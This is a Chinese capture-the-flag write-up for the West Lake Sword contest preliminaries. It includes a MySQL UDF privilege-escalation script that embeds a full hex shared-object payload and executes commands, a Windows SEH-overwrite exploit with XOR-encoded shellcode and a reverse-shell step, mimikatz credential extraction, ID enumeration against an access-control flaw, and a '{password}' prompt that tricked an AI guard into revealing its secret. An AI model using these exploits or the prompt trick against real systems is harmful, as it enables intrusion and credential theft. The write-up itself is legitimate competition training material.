MISC
2024签到题:
-
步骤一 下载附件,发现图片是一张公众号的二维码,在图片的属性详情里面发现flag线索
2.步骤二 扫描打开公众号,发送第七届西湖论剑,精彩继续获取flag
flag 为 DASCTF{gcsis_2024_we_are_ready}
easy_tables
1.步骤一:下载附件,根据题目要求,对’users’,’permissions’,’tables’,’actionlog’四个表的数据进行审计,因为数据量很大,所以通过写脚本进行筛选。
2.步骤二:下为根据题目要求所书写的脚本
import csv
import time
# 分别打开 四个 csv 文件
lists = ['users','permissions','tables','actionlog']
with open('users.csv', 'r', encoding='utf-8') as read_obj:
csv_reader = csv.reader(read_obj)
list_of_csv = list(csv_reader)
users = list_of_csv
with open('permissions.csv', 'r', encoding='utf-8') as read_obj:
csv_reader = csv.reader(read_obj)
list_of_csv = list(csv_reader)
permissions = list_of_csv
with open('tables.csv', 'r', encoding='utf-8') as read_obj:
csv_reader = csv.reader(read_obj)
list_of_csv = list(csv_reader)
tables = list_of_csv
with open('actionlog.csv', 'r', encoding='utf-8') as read_obj:
csv_reader = csv.reader(read_obj)
list_of_csv = list(csv_reader)
actionlog = list_of_csv
# user 取 0 1 3
# permissions 取 0 2 3
# tables 取 0 1 2
# actionlog 取 0 1 2 3
name_ti = 0
per_ti = 0
flag = ''
#下面是通过循环相互对比,不符合条件的就print出来
for log in actionlog[1:]:
log_id = log[0]
log_name = log[1]
log_time = log[2].split(' ')[1]
log_opt = log[3]
for users_A in users[1:]:
users_id = users_A[0]
users_name = users_A[1]
users_per = users_A[3]
if users_name == log_name:
name_ti = 0
for per_A in permissions[1:]:
per_id = per_A[0]
per_qx = per_A[2]
per_table = per_A[3]
if users_per == per_id:
log_opt_list = log_opt.split(' ')
per_table_list = per_table.split(',')
for tb in tables[1:]:
tb_id = tb[0]
tb_name = tb[1]
tb_time = tb[2].split(",")
if tb_name in log_opt_list:
if tb_id in per_table_list:
if log_opt_list[0] in per_qx:
try:
tb_time_1 = tb_time[0].split('~')
tb_time_2 = tb_time[1].split('~')
if tb_time_1[0] < log_time < tb_time_1[1] or tb_time_2[0] < log_time <
tb_time_2[1]:
pass
else:
print('编号:', log_id, '账户不在规定时间内操作操作',
users_id + '_' + per_id + '_' + tb_id + '_' + log_id)
flag += users_id + '_' + per_id + '_' + tb_id + '_' + log_id + ','
except:
tb_time = tb_time[0].split("~")
if tb_time[0] < log_time < tb_time[1]:
pass
else:
print('编号:', log_id, '账户不在规定时间内操作操作',
users_id + '_' + per_id + '_' + tb_id + '_' + log_id)
flag += users_id + '_' + per_id + '_' + tb_id + '_' + log_id + ','
else:
print('编号:', log_id, '为对表执行不属于其权限的操作',users_id+'_'+per_id+'_'+tb_id+'_'+log_id)
flag += users_id+'_'+per_id+'_'+tb_id+'_'+log_id+','
else:
print('编号:', log_id, '为对不可操作的表执行操作',users_id+'_'+per_id+'_'+tb_id+'_'+log_id)
flag += users_id + '_' + per_id + '_' + tb_id + '_' + log_id + ','
break
break
break # 这个 break 是用来找到匹配的name后跳到下一个 log_name 的
else:
name_ti += 1
if name_ti == len(users[1:]):
print('编号:',log_id,'为不存在用户操作','0_0_0_'+log_id)
flag += '0_0_0_'+log_id+','
name_ti = 0
print(flag)
# 最后手动以第一个数字的大小来排序进行md5
# 0_0_0_6810,0_0_0_8377,6_14_91_6786,7_64_69_3448,9_18_61_5681,30_87_36_235,31_76_85_9617,49_37_30_8295,75_15_43_8461,79_3_15_9011
步骤三:题目有一点没写,要将得到的数字按开头第一个数字进行排序,后在md5才是正确答案 最后flag 为
flag 为 271b1ffebf7a76080c7a6e134ae4c929
easy_rawraw
步骤一:下载附件,解压见一个 rawraw.raw 文件和 mysecretfile.rar 的压缩包
步骤二:使用 vol.py 对进行rawraw.raw读取,首先使用 imageinfo 查看镜像系统
这里选择 Win7SP1x64 来进行下面步骤,然后使用 filescan 命令进行扫描
发现一个叫 pass.zip 的文件十分可疑,使用 dumpfiles 命令进行提取后重命名
打开 pass.zip 发现为一个png 图片
使用 foremost 提取内部文件,打开发现是一个加密 zip 文件
这一步有些脑洞,根据 压缩包注释的 Have a good New Year!!!!!!! 猜测密码为 新年的日期 20240210
解压成功,得到内部的 pass.txt 文件,暂时不管。
使用 vol.py 的 clipboard 查看剪切板,发现有内容
使用 clipboard -v 查看详情内容
在其下面可以看到密码
密码为 DasrIa456sAdmIn987使用密码 DasrIa456sAdmIn987 对 mysecretfile.rar 进行解压,获得 mysecretfile 文件
又通过 vol.py 的 pslist 命令可以看到有 VeraCrypt.exe 进程存在,并且通过 cmdline 也可以看到
由此可以合理猜测 mysecretfile 文件 是被VeraCrypt 加密过的文件,而我们刚刚也获取到了一个名叫 pass.txt 的文件,可以推测其为 其密钥文件,对其进行解密
成功加载,我的电脑是默认显示隐藏的,这个data.xlsx 是被隐藏的文件,双击点开,发现需要密码
这里使用 vol.py 的 mimikatz 插件获取 rawraw.raw的密码
获得密码 das123admin321 ,使用密码对 data.xlsx文档进行解密,成功解密
仔细观察可以发现,表格内没有第10行,点击打开即可获取 flag
flag为 DASCTF{5476d4c4ade0918c151aa6dcac12d130} ,只用提交花括号内的内容即可
WEB
only_sql
mysql任意文件读取``UDF提权打开题目,给了一个远程链接数据库界面
成功进行连接,执行任意命令,查看mysql.log读取到passwd文件
这里我们的思路,可读取/var/www/html/query.php文件,获取到本地数据库密码进行链接,再通过UDF进行提权获取flag修改此处
读取到数据库用户密码信息,密码为1q2w3e4r5t!@#
链接本地数据库
最后编写exp进行udf提权操作即可,在环境变量值获取flag值
imprt requests
url="http://1.14.108.193:30098/query.php"
headers = {"Cookie":"Hm_lvt_1cd9bcbaae133f03a6eb19da6579aaba=1706580278; Hm_lpvt_1cd9bcbaae133f03a6eb19da6579aaba=1706580634; PHPSESSID=429brrrnin0mc65rm8l4itrd9t"}
## 参考国光的https://www.sqlsec.com/udf/
payload = "select unhex('7F454C4602010100000000000000000003003E0001000000D00C0000000000004000000000000000E8180000000000000000000040003800050040001A00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050E57464040000006412000000000000641200000000000064120000000000009C000000000000009C00000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002B0000001500000005000000280000001E000000000000000000000006000000000000000C00000000000000070000002A00000009000000210000000000000000000000270000000B0000002200000018000000240000000E00000000000000040000001D0000001600000000000000130000000000000000000000120000002300000010000000250000001A0000000F000000000000000000000000000000000000001B00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000A00000011000000000000000000000000000000000000000D0000002600000017000000000000000800000000000000000000000000000000000000000000001F0000001C0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119C4C93DA4400398046883140000001600000017000000190000001B0000001D0000002000000022000000000000002300000000000000240000002500000027000000290000002A00000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED871581CC1E2F7DEA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF36AC68AE3B9FD4A0AC73D1C525681B320B5911FEAB5FBE120000000000000000000000000000000000000000000000000000000003000900A00B0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000E0000000120000000000000000000000DE01000000000000790100001200000000000000000000007700000000000000BA0000001200000000000000000000003504000000000000F5000000120000000000000000000000C2010000000000009E010000120000000000000000000000D900000000000000FB000000120000000000000000000000050000000000000016000000220000000000000000000000FE00000000000000CF000000120000000000000000000000AD00000000000000880100001200000000000000000000008000000000000000AB010000120000000000000000000000250100000000000010010000120000000000000000000000DC00000000000000C7000000120000000000000000000000C200000000000000B5000000120000000000000000000000CC02000000000000ED000000120000000000000000000000E802000000000000E70000001200000000000000000000009B00000000000000C200000012000000000000000000000028000000000000008001000012000B007A100000000000006E000000000000007500000012000B00A70D00000000000001000000000000001000000012000C00781100000000000000000000000000003F01000012000B001A100000000000002D000000000000001F01000012000900A00B0000000000000000000000000000C30100001000F1FF881720000000000000000000000000009600000012000B00AB0D00000000000001000000000000007001000012000B0066100000000000001400000000000000CF0100001000F1FF981720000000000000000000000000005600000012000B00A50D00000000000001000000000000000201000012000B002E0F0000000000002900000000000000A301000012000B00F71000000000000041000000000000003900000012000B00A40D00000000000001000000000000003201000012000B00EA0F0000000000003000000000000000BC0100001000F1FF881720000000000000000000000000006500000012000B00A60D00000000000001000000000000002501000012000B00800F0000000000006A000000000000008500000012000B00A80D00000000000003000000000000001701000012000B00570F00000000000029000000000000005501000012000B0047100000000000001F00000000000000A900000012000B00AC0D0000000000009A000000000000008F01000012000B00E8100000000000000F00000000000000D700000012000B00460E000000000000E800000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974007379735F6765745F6465696E6974007379735F657865635F6465696E6974007379735F6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C00666F726B00737973636F6E66006D6D6170007374726E6370790077616974706964007379735F6576616C006D616C6C6F6300706F70656E007265616C6C6F630066676574730070636C6F7365007379735F6576616C5F696E697400737472637079007379735F657865635F696E6974007379735F7365745F696E6974007379735F6765745F696E6974006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F657865630073797374656D007379735F73657400736574656E76007379735F7365745F6465696E69740066726565007379735F67657400676574656E76006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100B20100001000000000000000751A690900000200D401000000000000801720000000000008000000000000008017200000000000D01620000000000006000000020000000000000000000000D81620000000000006000000030000000000000000000000E016200000000000060000000A00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000A00000000000000000000003817200000000000070000000B00000000000000000000004017200000000000070000000C00000000000000000000004817200000000000070000000D00000000000000000000005017200000000000070000000E00000000000000000000005817200000000000070000000F00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883EC08E827010000E8C2010000E88D0500004883C408C3FF35320B2000FF25340B20000F1F4000FF25320B20006800000000E9E0FFFFFFFF252A0B20006801000000E9D0FFFFFFFF25220B20006802000000E9C0FFFFFFFF251A0B20006803000000E9B0FFFFFFFF25120B20006804000000E9A0FFFFFFFF250A0B20006805000000E990FFFFFFFF25020B20006806000000E980FFFFFFFF25FA0A20006807000000E970FFFFFFFF25F20A20006808000000E960FFFFFFFF25EA0A20006809000000E950FFFFFFFF25E20A2000680A000000E940FFFFFFFF25DA0A2000680B000000E930FFFFFFFF25D20A2000680C000000E920FFFFFFFF25CA0A2000680D000000E910FFFFFFFF25C20A2000680E000000E900FFFFFFFF25BA0A2000680F000000E9F0FEFFFF00000000000000004883EC08488B05F50920004885C07402FFD04883C408C390909090909090909055803D900A2000004889E5415453756248833DD809200000740C488B3D6F0A2000E812FFFFFF488D05130820004C8D2504082000488B15650A20004C29E048C1F803488D58FF4839DA73200F1F440000488D4201488905450A200041FF14C4488B153A0A20004839DA72E5C605260A2000015B415CC9C3660F1F8400000000005548833DBF072000004889E57422488B05530920004885C07416488D3DA70720004989C3C941FFE30F1F840000000000C9C39090C3C3C3C331C0C3C341544883C9FF4989F455534883EC10488B4610488B3831C0F2AE48F7D1488D69FFE8B6FEFFFF83F80089C77C61754FBF1E000000E803FEFFFF488D70FF4531C94531C031FFB921000000BA07000000488D042E48F7D64821C6E8AEFEFFFF4883F8FF4889C37427498B4424104889EA4889DF488B30E852FEFFFFFFD3EB0CBA0100000031F6E802FEFFFF31C0EB05B8010000005A595B5D415CC34157BF00040000415641554531ED415455534889F34883EC1848894C24104C89442408E85AFDFFFFBF010000004989C6E84DFDFFFFC600004889C5488B4310488D356A030000488B38E814FEFFFF4989C7EB374C89F731C04883C9FFF2AE4889EF48F7D1488D59FF4D8D641D004C89E6E8DDFDFFFF4A8D3C284889DA4C89F64D89E54889C5E8A8FDFFFF4C89FABE080000004C89F7E818FDFFFF4885C075B44C89FFE82BFDFFFF807D0000750A488B442408C60001EB1F42C6442DFF0031C04883C9FF4889EFF2AE488B44241048F7D148FFC94889084883C4184889E85B5D415C415D415E415FC34883EC08833E014889D7750B488B460831D2833800740E488D353A020000E817FDFFFFB20188D05EC34883EC08833E014889D7750B488B460831D2833800740E488D3511020000E8EEFCFFFFB20188D05FC3554889FD534889D34883EC08833E027409488D3519020000EB3F488B46088338007409488D3526020000EB2DC7400400000000488B4618488B384883C70248037808E801FCFFFF31D24885C0488945107511488D351F0200004889DFE887FCFFFFB20141585B88D05DC34883EC08833E014889F94889D77510488B46088338007507C6010131C0EB0E488D3576010000E853FCFFFFB0014159C34154488D35EF0100004989CC4889D7534889D34883EC08E832FCFFFF49C704241E0000004889D8415A5B415CC34883EC0831C0833E004889D7740E488D35D5010000E807FCFFFFB001415BC34883EC08488B4610488B38E862FBFFFF5A4898C34883EC28488B46184C8B4F104989F2488B08488B46104C89CF488B004D8D4409014889C6F3A44C89C7498B4218488B0041C6040100498B4210498B5218488B4008488B4A08BA010000004889C6F3A44C89C64C89CF498B4218488B400841C6040000E867FBFFFF4883C4284898C3488B7F104885FF7405E912FBFFFFC3554889CD534C89C34883EC08488B4610488B38E849FBFFFF4885C04889C27505C60301EB1531C04883C9FF4889D7F2AE48F7D148FFC948894D00595B4889D05DC39090909090909090554889E5534883EC08488B05C80320004883F8FF7419488D1DBB0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E86FFBFFFF4883C408C345787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D657465720045787065637465642065786163746C792074776F20617267756D656E747300457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E34004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F290000011B033B980000001200000040FBFFFFB400000041FBFFFFCC00000042FBFFFFE400000043FBFFFFFC00000044FBFFFF1401000047FBFFFF2C01000048FBFFFF44010000E2FBFFFF6C010000CAFCFFFFA4010000F3FCFFFFBC0100001CFDFFFFD401000086FDFFFFF4010000B6FDFFFF0C020000E3FDFFFF2C02000002FEFFFF4402000016FEFFFF5C02000084FEFFFF7402000093FEFFFF8C0200001400000000000000017A5200017810011B0C070890010000140000001C00000084FAFFFF01000000000000000000000014000000340000006DFAFFFF010000000000000000000000140000004C00000056FAFFFF01000000000000000000000014000000640000003FFAFFFF010000000000000000000000140000007C00000028FAFFFF030000000000000000000000140000009400000013FAFFFF01000000000000000000000024000000AC000000FCF9FFFF9A00000000420E108C02480E18410E20440E3083048603000000000034000000D40000006EFAFFFFE800000000420E10470E18420E208D048E038F02450E28410E30410E38830786068C05470E50000000000000140000000C0100001EFBFFFF2900000000440E100000000014000000240100002FFBFFFF2900000000440E10000000001C0000003C01000040FBFFFF6A00000000410E108602440E188303470E200000140000005C0100008AFBFFFF3000000000440E10000000001C00000074010000A2FBFFFF2D00000000420E108C024E0E188303470E2000001400000094010000AFFBFFFF1F00000000440E100000000014000000AC010000B6FBFFFF1400000000440E100000000014000000C4010000B2FBFFFF6E00000000440E300000000014000000DC01000008FCFFFF0F00000000000000000000001C000000F4010000FFFBFFFF4100000000410E108602440E188303470E2000000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF000000000000000000000000000000000100000000000000B2010000000000000C00000000000000A00B0000000000000D00000000000000781100000000000004000000000000005801000000000000F5FEFF6F00000000A00200000000000005000000000000006807000000000000060000000000000060030000000000000A00000000000000E0010000000000000B0000000000000018000000000000000300000000000000E81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200A0000000000000700000000000000C0090000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000A009000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000004809000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000CE0B000000000000DE0B000000000000EE0B000000000000FE0B0000000000000E0C0000000000001E0C0000000000002E0C0000000000003E0C0000000000004E0C0000000000005E0C0000000000006E0C0000000000007E0C0000000000008E0C0000000000009E0C000000000000AE0C000000000000BE0C0000000000008017200000000000004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200004743433A202844656269616E20342E332E322D312E312920342E332E3200002E7368737472746162002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E64796E616D6963002E676F74002E676F742E706C74002E64617461002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000B000000F6FFFF6F0200000000000000A002000000000000A002000000000000C000000000000000030000000000000008000000000000000000000000000000150000000B00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001D00000003000000020000000000000068070000000000006807000000000000E00100000000000000000000000000000100000000000000000000000000000025000000FFFFFF6F020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000FEFFFF6F0200000000000000A009000000000000A009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000C009000000000000C00900000000000060000000000000000300000000000000080000000000000018000000000000004B000000040000000200000000000000200A000000000000200A0000000000008001000000000000030000000A0000000800000000000000180000000000000055000000010000000600000000000000A00B000000000000A00B000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000B80B000000000000B80B00000000000010010000000000000000000000000000040000000000000010000000000000005B000000010000000600000000000000D00C000000000000D00C000000000000A80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000E000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000DD000000000000000000000000000000010000000000000001000000000000006F000000010000000200000000000000641200000000000064120000000000009C000000000000000000000000000000040000000000000000000000000000007D000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008E000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009A000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000A3000000010000000300000000000000D016200000000000D0160000000000001800000000000000000000000000000008000000000000000800000000000000A8000000010000000300000000000000E816200000000000E8160000000000009800000000000000000000000000000008000000000000000800000000000000B1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000B7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000BC000000010000000000000000000000000000000000000088170000000000009B000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000C500000000000000000000000000000001000000000000000000000000000000') into dumpfile '/usr/lib/mysql/p1ugin/mysqludf.so';"
payload1 = 'create function sys_eval returns string soname "mysqludf.so";'
payload2 = "select sys_eval('env');" # 读取环境变量
data = {"db_command": payload}
data1 = {"db_command": payload1}
data2 = {"db_command": payload2}
resp = requests.post(url, data=data, headers=headers)
resp1 = requests.post(url, data=data1, headers=headers)
resp2 = requests.post(url, data=data2, headers=headers)
if "DASCTF{" in resp2.text:
print(resp2.text)
PWN
babywin
代码审计
这里有gitf,不知道是什么作用,我们继续看sub_4010E0函数
现在就很明显了,典型的栈溢出漏洞保护机制
发现没有看NX保护,而且开了security_cookie(上面显示的是canary是linux的,但是基本上都是栈溢出检测)保护,而且也没有开ASLR,这样程序运行基址不会变,同样发现了SafeSEH
思路
根据代码审计,可以发现我们无法绕过security_cookie保护
strcpy也会往后加00,strcat同样也会,所以我们也无法连带着GS的数据,反而会被覆盖到GS,从而破坏了GS导致程序崩溃 但是在调试程序的过程中,注意到了这个
在我们可以覆盖的位置上,于是想到了我们可以控制__except_handler4的值,使得我们可以控制执行流程 但是该如何触发呢,也是想到覆盖到__except_handler4的值的时候,发现应该是我们覆盖了一下不应该被覆盖的值,使得strcat向非法地址写入,使得程序抛出异常(这里跟GS不一样,GS是程序自发使得结束进程;而这里是我们调用函数的过程中,函数运行时崩溃),然后就会跳到__except_handler4指向的地址中
下面就是想如何绕过SafeSEH的检测,我想到一开始的gift.dll,于是也check了一下
发现开了NX但是没有开ASLR,更主要是没有开SafeSEH,之前在某篇文章上看到说,可以通过跳到没有开启SafeSEH的代码地址上,来绕过,所以我们现在也找好了,利用gift.dll的代码,然后我们看看怎么实现真正意义上控制程序执行流程 然后我先看到对应位置时,栈布局
发现有一个是我们可以覆盖其指向的内存的栈地址0019FF64,也就是我们覆盖__except_handler4的位置的上方,所以我们利用这个gadget来实现跳到对应位置上
然后因为gift.dll是没有00字节的,所以我们可以在其后方布置shellcode,现在的问题在于如何利用四字节跳到后面 这里直接用
jmp_8 = asm("jmp $+8")
这样就可以直接跳到后面去了 随后的问题又来了,我们怎么getshell,通过kali的msfvenom生成的shellcode至少需要200+个字节,所以我们现在就要利用程序自身的函数,来写入,所以我这里需要模拟调用fgets的过程,也就是这块
我们最好是不要调到这个位置上去执行,而是自己利用shellcode来实现,在我们写shellcode的时候,需要有一个点就是不能有00字符,因为我们利用的都是最开始的strcpy复制到栈上,所以不能有00字符 这里就需要通过xor写入shellcode了,我这里把0xffffffff当作是key进行解密
code = asm("""
mov ebx,0xffffffff
xor ecx,ecx
mov edi,0xffbfdf43
xor edi,ebx
push ecx
call [edi]
mov edi,0xffbfdf3f
xor edi,ebx
push eax
mov esi,0xfffffbff
xor esi,ebx
push esi
push esp
call [edi]
pop esi
jmp esp
""")
# fgets(esp,0x400,stdin)
这样子我们就可以乱写shellcode进去啦,后面就是找shellcode了,对于msfvenom还是不太熟悉,卡了挺久的 我这里用的是这一个
反弹shell,当然理论上是可以直接变shell的,这块的shellcode编写生成,没学过
exp
from pwn import*
context(arch='i386',log_level="debug")
context.terminal=["wt.exe","wsl.exe"]
#libc = ELF("../libc/")
# libc = ELF("./libc-so.6")
"""""
def xxx():
p.sendlineafter("")
p.sendlineafter("")
p.sendlineafter("")
"""
def get_p(name):
global p
# p = process(name)
# p = remote("139.155.132.144",10000)
p = remote("127.0.0.1",1000)
# elf = ELF(name)
# code = asm("""
# mov ebx,0xffffffff
# xor ecx,ecx
# mov edi,0xffbfdf43
# xor edi,ebx
# push ecx
# call [edi]
# mov edi,0xffbfdf3f
# xor edi,ebx
# push eax
# mov esi,0xfffffbff
# xor esi,ebx
# push esi
# push esp
# call [edi]
# pop esi
# jmp esp
# """)
# print(code)
with open("./payload.txt", 'rb') as f:
datas = f.read()
print(datas)
code = b'xbbxffxffxffxff1xc9xbfCxdfxbfxff1xdfQxffx17xbf?xdfxbfxff1xdfPxbexffxfbxffxff1xdeVTxffx17^xffxe4'
get_p("")
pause()
p.sendlineafter("give your data:",b"x90"*(0x3e*2-4) +b'xebx06x90x90' + p32(0x271F19F5) + code + b"x00")
# gdb.attach(p,"")
raw_input()
p.sendline(datas)
p.interactive()
最终在pwn目录下读取flag
如果中午没重要的事的话,指不定就一血了哈哈哈哈
RE
MZ
无壳 x32程序,但是开启了随机基址,使用010关闭即可。
直接用IDA打开,主函数
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4; // [esp+0h] [ebp-26Ch]
int v5; // [esp+D0h] [ebp-19Ch]
unsigned __int8 v6; // [esp+DFh] [ebp-18Dh]
int i; // [esp+E8h] [ebp-184h]
char Buf1[52]; // [esp+F4h] [ebp-178h] BYREF
_BYTE v9[264]; // [esp+128h] [ebp-144h] BYREF
char Str[56]; // [esp+230h] [ebp-3Ch] BYREF
__CheckForDebuggerJustMyCode(&unk_444018);
memset(Str, 0, 0x31u);
memset(v9, 0, 0x100u);
memset(Buf1, 0, 0x29u);
sub_401020();
sub_434D00("%48s", (char)Str);
if ( strlen(Str) != 48 )
{
sub_434C80("Wrong lengthn", v4);
exit(0);
}
for ( i = 0; i < 48; ++i )
{
v6 = Str[i];
v5 = off_439000[2 * v6];
if ( v6 - 5 == v5 )
{
v9[i] = ~(v6 + 1);
}
else
{
if ( v6 + 5 != v5 )
{
sub_434C80("Wrong flagn", v4);
exit(0);
}
v9[i] = ~(v6 - 1);
}
off_439000 = (int *)off_439000[2 * v6 + 1];
}
sub_434190((int)v9, 48, 0, Buf1);
if ( !memcmp(Buf1, aDc0562f86bec0a, 0x28u) )
sub_434C80("Right, the flag is DASCTF{%s}n", (char)Str);
else
sub_434C80("Wrong flagn", v4);
return 0;
}
在scanf函数前有个很大的函数sub_401020,对0x439078开始的地址进行赋值操作,用于后续的字符映射和比较。这里赋值的值是固定的
最后面还有一个sub_434190函数,对输入进行了sha1加密,于flag的哈希校验。这里解题有两种方法 第一个是模拟映射流程
a = ['0043F7D800000005',
'0043E2E000000002', '00441E1000000014', '0043E9D800000015', '00440CB00000002B', '0043CD7000000076', '0043CE580000005F', '0043EAC80000000C', '0043A4380000005D', '0043A95000000067', '00440CF00000000D', '0043D28800000045', '004400300000006C', '0043E7C00000004A', '004390E000000045', '0043C85800000020', '0043BB8800000050', '0043C41000000071', '0043E4C000000045', '0043F0E000000044', '00440A080000006A', '0043D77800000050', '0043CF180000001F', '0043CD6800000036', '0043BEA800000009', '0043E38000000056', '0043CA7000000028', '0043AA100000000A', '0043DAA800000035', '004419300000007D', '0043BA980000007D', '0043B3D80000002B', '0043C64800000001',
'''......... 省略'''
'0043C2A800000000', '0043D5B800000008', '0043BE0000000040', '0043C5C000000000', '0043EE900000001E', '0044191000000042', '0043B8500000004B', '0043EEF00000000D', '004418A000000035', '0044230000000052', '0043F76800000023', '0044040800000033', '0043F16800000036', '0043A5700000005F', '0043FC700000001B', '0043B2900000004D',
'0043EFE80000001D', '004402100000005F', '0043B2B000000075', '0043BC8000000055', '004419280000001D', '00441F5800000057', '0043F85000000053']
# 第一个字符
for i in range(0, 255):
if a[i][14:] == hex(i+5)[2:].zfill(2):
print(i) # S
# 第二个字符
base = int('0x'+a[ord('S')+0][0:8], 16) - 0x439078
for i in range(ord('0'), ord('z')):
tmp = (base // 8) + i
if a[tmp][14:] == hex(i+5)[2:]:
print(chr(i), a[tmp][0:8])
# 第三个字符
base = 0x4396F0 - 0x4393A8
for i in range(ord('0'), ord('z')):
tmp = (base // 8) + i
if a[tmp][14:] == hex(i-5)[2:]:
print(chr(i), a[tmp][0:8])
#...以此类推
# Somet1mes_ch0ice_i5_more_import@nt_tHan_effort~!
第二种是 侧信道需要先patch程序,将错误的位置输出出来
效果如下
写脚本进行爆破
import subprocess
def brute(input):
p = subprocess.Popen('MZ.exe',
stdout=subprocess.PIPE,
stdin=subprocess.PIPE,
stderr=subprocess.STDOUT,
)
# 输出stdout
p.stdin.write(input.decode())
p.stdin.flush()
ouput = p.stdout.readline()
return ouput
a = b'SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS'
# 每次爆破出来要自动分别是否有用字符,再添加
flag = b'Somet1mes_ch0ice_i5_more_import@nt_tHan_effort~!'
for i in range(0, 1): # 每次爆破的索引
for x in range(ord('0'), ord('}')+1):
input = flag[:i] + chr(x).encode() + a[i+1:]
res = brute(input)
if res != str(i):
flag += chr(x).encode()
print(flag)
最终flagSomet1mes_ch0ice_i5_more_import@nt_tHan_effort~!
AI
回声海螺
题目描述:打开保险柜即可获取flag,赶紧来试试吧 很奇怪的一道Ai题,也算碰巧吧,查询了一些历史题目。
思路:打开题目,是一个静态页面,提示需要破解密码这里我们点击下面按钮来到海螺按钮,来到此处键入{password}
成功获取密码为578316249,本来尝试爆破操作未果,后端做了时间限制。至于这题为什么键入{password}便可绕过AI检测机制了,就很奇妙了
数据安全
Cyan-1
注册一个账号,来到考试界面
点击开始考试,先完成考试来到评分环节,此处有一个越权漏洞
遍历值ehid
成功遍历到一份满分答卷,拼接ehid=363
访问地址:http://exam.cyan.wetolink.com/index.php?exam-app-history-stats&ehid=363,成功获取到flag
后面环节就是进行代码审计,去挖掘其中链子反序列化构造,貌似是出题人挖的0day
Crypto-未解
Or1cle
简单写一下啦,属于赛后出的题,差一点时间没提交到NC进行远程连接后,键入如下sign绕过
00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
签名认证后获取flag
原文始发于微信公众号(ACT Team):第七届西湖论剑·中国杭州网络安全技能大赛初赛Writeup
